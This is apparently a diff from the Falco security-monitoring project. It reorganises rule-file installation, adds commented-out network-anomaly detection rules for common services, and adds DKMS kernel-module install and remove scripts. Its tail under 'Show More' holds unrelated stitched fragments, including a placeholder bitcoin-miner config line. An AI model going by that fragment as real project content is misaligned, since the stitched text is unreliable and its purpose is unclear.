-  set(FALCO_ETC_DIR "/etc")
+  set(FALCO_ETC_DIR "/etc/falco")
 endif()

 if(NOT DEFINED FALCO_RULES_DEST_FILENAME)
  set(FALCO_RULES_DEST_FILENAME "falco_rules.yaml")
+  set(FALCO_LOCAL_RULES_DEST_FILENAME "falco_rules.local.yaml")
+  set(FALCO_APP_RULES_DEST_FILENAME "application_rules.yaml")
 endif()

 if(DEFINED FALCO_COMPONENT)
@@ -11,9 +13,27 @@ install(FILES falco_rules.yaml
        COMPONENT "${FALCO_COMPONENT}"
 	DESTINATION "${FALCO_ETC_DIR}"
 	RENAME "${FALCO_RULES_DEST_FILENAME}")
+
+install(FILES falco_rules.local.yaml
+        COMPONENT "${FALCO_COMPONENT}"
+	DESTINATION "${FALCO_ETC_DIR}"
+	RENAME "${FALCO_LOCAL_RULES_DEST_FILENAME}")
+
+# Intentionally *not* installing application_rules.yaml. Not needed
+# when falco is embedded in other projects.
 else()
 install(FILES falco_rules.yaml
-        DESTINATION "${FALCO_ETC_DIR}"
-        RENAME "${FALCO_RULES_DEST_FILENAME}")
+	DESTINATION "${FALCO_ETC_DIR}"
+	RENAME "${FALCO_RULES_DEST_FILENAME}")
+
+install(FILES falco_rules.local.yaml
+	DESTINATION "${FALCO_ETC_DIR}"
+	RENAME "${FALCO_LOCAL_RULES_DEST_FILENAME}")
+
+install(FILES application_rules.yaml
+	DESTINATION "/etc/falco/rules.available"
+	RENAME "${FALCO_APP_RULES_DEST_FILENAME}")
+
+install(DIRECTORY DESTINATION "/etc/falco/rules.d")
 endif()

--- a/rules/application_rules.yaml
+++ b/rules/application_rules.yaml
@@ -0,0 +1,169 @@
+################################################################
+# By default all application-related rules are disabled for
+# performance reasons. Depending on the application(s) you use,
+# uncomment the corresponding rule definitions for
+# application-specific activity monitoring.
+################################################################
+
+# Elasticsearch ports
+- macro: elasticsearch_cluster_port
+  condition: fd.sport=9300
+- macro: elasticsearch_api_port
+  condition: fd.sport=9200
+- macro: elasticsearch_port
+  condition: elasticsearch_cluster_port or elasticsearch_api_port
+
+# - rule: Elasticsearch unexpected network inbound traffic
+#   desc: inbound network traffic to elasticsearch on a port other than the standard ports
+#   condition: user.name = elasticsearch and inbound and not elasticsearch_port
+#   output: "Inbound network traffic to Elasticsearch on unexpected port (connection=%fd.name)"
+#   priority: WARNING
+
+# - rule: Elasticsearch unexpected network outbound traffic
+#   desc: outbound network traffic from elasticsearch on a port other than the standard ports
+#   condition: user.name = elasticsearch and outbound and not elasticsearch_cluster_port
+#   output: "Outbound network traffic from Elasticsearch on unexpected port (connection=%fd.name)"
+#   priority: WARNING
+
+
+# ActiveMQ ports
+- macro: activemq_cluster_port
+  condition: fd.sport=61616
+- macro: activemq_web_port
+  condition: fd.sport=8161
+- macro: activemq_port
+  condition: activemq_web_port or activemq_cluster_port
+
+# - rule: Activemq unexpected network inbound traffic
+#   desc: inbound network traffic to activemq on a port other than the standard ports
+#   condition: user.name = activemq and inbound and not activemq_port
+#   output: "Inbound network traffic to ActiveMQ on unexpected port (connection=%fd.name)"
+#   priority: WARNING
+
+# - rule: Activemq unexpected network outbound traffic
+#   desc: outbound network traffic from activemq on a port other than the standard ports
+#   condition: user.name = activemq and outbound and not activemq_cluster_port
+#   output: "Outbound network traffic from ActiveMQ on unexpected port (connection=%fd.name)"
+#   priority: WARNING
+
+
+# Cassandra ports
+# https://docs.datastax.com/en/cassandra/2.0/cassandra/security/secureFireWall_r.html
+- macro: cassandra_thrift_client_port
+  condition: fd.sport=9160
+- macro: cassandra_cql_port
+  condition: fd.sport=9042
+- macro: cassandra_cluster_port
+  condition: fd.sport=7000
+- macro: cassandra_ssl_cluster_port
+  condition: fd.sport=7001
+- macro: cassandra_jmx_port
+  condition: fd.sport=7199
+- macro: cassandra_port
+  condition: >
+    cassandra_thrift_client_port or
+    cassandra_cql_port or cassandra_cluster_port or
+    cassandra_ssl_cluster_port or cassandra_jmx_port
+
+# - rule: Cassandra unexpected network inbound traffic
+#   desc: inbound network traffic to cassandra on a port other than the standard ports
+#   condition: user.name = cassandra and inbound and not cassandra_port
+#   output: "Inbound network traffic to Cassandra on unexpected port (connection=%fd.name)"
+#   priority: WARNING
+
+# - rule: Cassandra unexpected network outbound traffic
+#   desc: outbound network traffic from cassandra on a port other than the standard ports
+#   condition: user.name = cassandra and outbound and not (cassandra_ssl_cluster_port or cassandra_cluster_port)
+#   output: "Outbound network traffic from Cassandra on unexpected port (connection=%fd.name)"
+#   priority: WARNING
+
+# Couchdb ports
+# https://github.com/davisp/couchdb/blob/master/etc/couchdb/local.ini
+- macro: couchdb_httpd_port
+  condition: fd.sport=5984
+- macro: couchdb_httpd_ssl_port
+  condition: fd.sport=6984
+# xxx can't tell what clustering ports are used. not writing rules for this
+# yet.
+
+# Fluentd ports
+- macro: fluentd_http_port
+  condition: fd.sport=9880
+- macro: fluentd_forward_port
+  condition: fd.sport=24224
+
+# - rule: Fluentd unexpected network inbound traffic
+#   desc: inbound network traffic to fluentd on a port other than the standard ports
+#   condition: user.name = td-agent and inbound and not (fluentd_forward_port or fluentd_http_port)
+#   output: "Inbound network traffic to Fluentd on unexpected port (connection=%fd.name)"
+#   priority: WARNING
+
+# - rule: Tdagent unexpected network outbound traffic
+#   desc: outbound network traffic from fluentd on a port other than the standard ports
+#   condition: user.name = td-agent and outbound and not fluentd_forward_port
+#   output: "Outbound network traffic from Fluentd on unexpected port (connection=%fd.name)"
+#   priority: WARNING
+
+# Gearman ports
+# http://gearman.org/protocol/
+# - rule: Gearman unexpected network outbound traffic
+#   desc: outbound network traffic from gearman on a port other than the standard ports
+#   condition: user.name = gearman and outbound and outbound and not fd.sport = 4730
+#   output: "Outbound network traffic from Gearman on unexpected port (connection=%fd.name)"
+#   priority: WARNING
+
+# Zookeeper
+- macro: zookeeper_port
+  condition: fd.sport = 2181
+
+# Kafka ports
+# - rule: Kafka unexpected network inbound traffic
+#   desc: inbound network traffic to kafka on a port other than the standard ports
+#   condition: user.name = kafka and inbound and fd.sport != 9092
+#   output: "Inbound network traffic to Kafka on unexpected port (connection=%fd.name)"
+#   priority: WARNING
+
+# Memcached ports
+# - rule: Memcached unexpected network inbound traffic
+#   desc: inbound network traffic to memcached on a port other than the standard ports
+#   condition: user.name = memcached and inbound and fd.sport != 11211
+#   output: "Inbound network traffic to Memcached on unexpected port (connection=%fd.name)"
+#   priority: WARNING
+
+# - rule: Memcached unexpected network outbound traffic
+#   desc: any outbound network traffic from memcached. memcached never initiates outbound connections.
+#   condition: user.name = memcached and outbound
+#   output: "Unexpected Memcached outbound connection (connection=%fd.name)"
+#   priority: WARNING
+
+
+# MongoDB ports
+- macro: mongodb_server_port
+  condition: fd.sport = 27017
+- macro: mongodb_shardserver_port
+  condition: fd.sport = 27018
+- macro: mongodb_configserver_port
+  condition: fd.sport = 27019
+- macro: mongodb_webserver_port
+  condition: fd.sport = 28017
+
+# - rule: Mongodb unexpected network inbound traffic
+#   desc: inbound network traffic to mongodb on a port other than the standard ports
+#   condition: >
+#     user.name = mongodb and inbound and not (mongodb_server_port or
+#     mongodb_shardserver_port or mongodb_configserver_port or mongodb_webserver_port)
+#   output: "Inbound network traffic to MongoDB on unexpected port (connection=%fd.name)"
+#   priority: WARNING
+
+# MySQL ports
+# - rule: Mysql unexpected network inbound traffic
+#   desc: inbound network traffic to mysql on a port other than the standard ports
+#   condition: user.name = mysql and inbound and fd.sport != 3306
+#   output: "Inbound network traffic to MySQL on unexpected port (connection=%fd.name)"
+#   priority: WARNING
+
+# - rule: HTTP server unexpected network inbound traffic
+#   desc: inbound network traffic to a http server program on a port other than the standard ports
+#   condition: proc.name in (http_server_binaries) and inbound and fd.sport != 80 and fd.sport != 443
+#   output: "Inbound network traffic to HTTP Server on unexpected port (connection=%fd.name)"
+#   priority: WARNING
--- a/rules/falco_rules.local.yaml
+++ b/rules/falco_rules.local.yaml
@@ -0,0 +1,13 @@
+####################
+# Your custom rules!
+####################
+
+# Add new rules, like this one
+# - rule: The program "sudo" is run in a container
+#   desc: An event will trigger every time you run sudo in a container
+#   condition: evt.type = execve and evt.dir=< and container.id != host and proc.name = sudo
+#   output: "Sudo run in container (user=%user.name %container.info parent=%proc.pname cmdline=%proc.cmdline)"
+#   priority: ERROR
+#   tags: [users, container]
+
+# Or override/append to any rule, macro, or list from the Default Rules
--- a/rules/falco_rules.yaml
+++ b/rules/falco_rules.yaml
--- a/scripts/CMakeLists.txt
+++ b/scripts/CMakeLists.txt
@@ -1,5 +1,14 @@
+configure_file(debian/postinst.in debian/postinst)
+configure_file(debian/prerm.in debian/prerm)
+
 file(COPY "${PROJECT_SOURCE_DIR}/scripts/debian/falco"
 	DESTINATION "${PROJECT_BINARY_DIR}/scripts/debian")

 file(COPY "${PROJECT_SOURCE_DIR}/scripts/rpm/falco"
 	DESTINATION "${PROJECT_BINARY_DIR}/scripts/rpm")
+
+if(CMAKE_SYSTEM_NAME MATCHES "Linux")
+	install(PROGRAMS ${SYSDIG_DIR}/scripts/sysdig-probe-loader
+		DESTINATION ${FALCO_BIN_DIR}
+		RENAME falco-probe-loader)
+endif()
--- a/scripts/debian/postinst
+++ b/scripts/debian/postinst
@@ -1,9 +0,0 @@
-#!/bin/sh
-set -e
-
-NAME=falco
-
-if [ -x "/etc/init.d/$NAME" ]; then
-        update-rc.d $NAME defaults >/dev/null
-fi
-
--- a/scripts/debian/postinst.in
+++ b/scripts/debian/postinst.in
@@ -0,0 +1,32 @@
+#!/bin/sh
+set -e
+
+DKMS_PACKAGE_NAME="@PACKAGE_NAME@"
+DKMS_VERSION="@PROBE_VERSION@"
+NAME="@PACKAGE_NAME@"
+
+postinst_found=0
+
+case "$1" in
+	configure)
+		for DKMS_POSTINST in /usr/lib/dkms/common.postinst /usr/share/$DKMS_PACKAGE_NAME/postinst; do
+			if [ -f $DKMS_POSTINST ]; then
+				$DKMS_POSTINST $DKMS_PACKAGE_NAME $DKMS_VERSION /usr/share/$DKMS_PACKAGE_NAME "" $2
+				postinst_found=1
+				break
+			fi
+		done
+		if [ "$postinst_found" -eq 0 ]; then
+			echo "ERROR: DKMS version is too old and $DKMS_PACKAGE_NAME was not"
+			echo "built with legacy DKMS support."
+			echo "You must either rebuild $DKMS_PACKAGE_NAME with legacy postinst"
+			echo "support or upgrade DKMS to a more current version."
+			exit 1
+		fi
+	;;
+esac
+
+if [ -x "/etc/init.d/$NAME" ]; then
+        update-rc.d $NAME defaults >/dev/null
+fi
+
--- a/scripts/debian/prerm
+++ b/scripts/debian/prerm
@@ -1,13 +0,0 @@
-#!/bin/sh
-set -e
-
-NAME=falco
-
-if [ -x "/etc/init.d/$NAME" ]; then
-		if [ -x "`which invoke-rc.d 2>/dev/null`" ]; then
-				invoke-rc.d $NAME stop || exit $?
-		else
-				/etc/init.d/$NAME stop || exit $?
-		fi
-fi
-
--- a/scripts/debian/prerm.in
+++ b/scripts/debian/prerm.in
@@ -0,0 +1,23 @@
+#!/bin/sh
+set -e
+
+NAME="@PACKAGE_NAME@"
+
+if [ -x "/etc/init.d/$NAME" ]; then
+		if [ -x "`which invoke-rc.d 2>/dev/null`" ]; then
+				invoke-rc.d $NAME stop || exit $?
+		else
+				/etc/init.d/$NAME stop || exit $?
+		fi
+fi
+
+DKMS_PACKAGE_NAME="@PACKAGE_NAME@"
+DKMS_VERSION="@PROBE_VERSION@"
+
+case "$1" in
+	remove|upgrade|deconfigure)
+		if [  "$(dkms status -m $DKMS_PACKAGE_NAME -v $DKMS_VERSION)" ]; then
+			dkms remove -m $DKMS_PACKAGE_NAME -v $DKMS_VERSION --all
+		fi
+	;;
+esac
--- a/scripts/rpm/postinstall
+++ b/scripts/rpm/postinstall
@@ -1 +1,15 @@
+dkms add -m falco -v %{version} --rpm_safe_upgrade
+if [ `uname -r | grep -c "BOOT"` -eq 0 ] && [ -e /lib/modules/`uname -r`/build/include ]; then
+	dkms build -m falco -v %{version}
+	dkms install --force -m falco -v %{version}
+elif [ `uname -r | grep -c "BOOT"` -gt 0 ]; then
+	echo -e ""
+	echo -e "Module build for the currently running kernel was skipped since you"
+	echo -e "are running a BOOT variant of the kernel."
+else
+	echo -e ""
+	echo -e "Module build for the currently running kernel was skipped since the"
+	echo -e "kernel source for this kernel does not seem to be installed."
+fi
+
 /sbin/chkconfig --add falco
--- a/Show More
+++ b/Show More
				`@@ -0,0 +1 @@`
				`{"config": "some-bitcoin-miner-config-goes-here"}`
				`@@ -0,0 +1 @@`
				`require 'puppetlabs_spec_helper/module_spec_helper'`